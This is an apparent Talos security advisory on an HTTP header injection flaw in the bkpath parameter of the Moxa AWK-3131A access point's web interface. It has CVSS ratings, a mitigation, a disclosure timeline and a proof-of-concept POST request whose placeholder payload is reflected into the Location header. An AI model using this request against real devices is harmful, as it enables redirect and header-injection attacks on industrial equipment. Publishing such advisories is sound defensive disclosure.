Talos IntelligenceTALOS-2016-0234Moxa AWK-3131A Web Application bkpath HTTP Header Injection Vulnerability
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
0.003 Low
EPSS
Percentile
65.8%
Summary
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response.
Tested Versions
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
Product URLs
<http://www.moxa.com/product/AWK-3131A.htm>
CVSSv3 Score
3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N
Details
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.
Exploit Proof-of-Concept
Request POST /forms/iw_webSetParameters HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http:///time_set.asp Cookie: Password508= Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 486
iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE
Response HTTP/1.0 302 Redirect Server: GoAhead-Webs Date: Mon Oct 31 17:33:45 2016 Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Expires: -1 Content-Type: text/html Location: http:///EVIL_INJECTION
<html><head></head><body>
..This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
..Please update your documents to reflect the new location.
..</body></html>
Mitigation
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
Timeline
2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release
Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
0.003 Low
EPSS
Percentile
65.8%